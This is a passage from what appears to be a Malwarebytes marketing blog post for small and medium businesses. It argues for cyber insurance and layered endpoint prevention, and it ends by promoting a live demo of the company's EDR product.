In 2022 alone, the average cost of a data breach for businesses under 1,000 employees was close to $3 million—and these costs are coming from activities that cyber insurers typically cover, such as detecting and responding to the breach.

So when it comes to preventing having to pay huge out of pocket costs in the event that you’re hit with a cyberattack, cyber insurance is a must. The harsh truth is that if you don’t have cyber insurance and are hit with ransomware with no way to recover files, you will likely go out of business—especially if you’re a small-and-medium-sized business. 

Read more: 4 ways businesses can save money on cyber insurance 

A “Matryoshka approach” to cyber prevention

Let’s recap. 

Relying solely on a single technology or technique to protect your businesses’ endpoints is a fool’s errand. 

At the same time, we have to understand that each business has different needs when it comes to prevention: Your level of risk is the chief decider of what tech you ultimately employ to prevent cyberattacks. Depending on your industry and company size, you could justifiably use all of these technologies and more—or none of them.

However, most SMBs will find themselves in the middle of the risk-prevention spectrum. To that end, the following are strongly recommended: Endpoint protection, VPM, DNS filtering, cloud storage scanning, and 2FA (and cyber insurance!). 

Of course, you can’t prevent 100% of threats. Therefore, you need an EDR solution to detect and respond to what does get through. That is to say, you should pair any preventative technology with an EDR solution, and a good EDR can seamlessly integrate with all of the preventative technologies listed here.

Want to see what effective prevention and response look like in action? See below for a live demonstration of Malwarebytes Endpoint Detection and Response (EDR):

TAKE ME TO a LIVE DEMO OF EDR!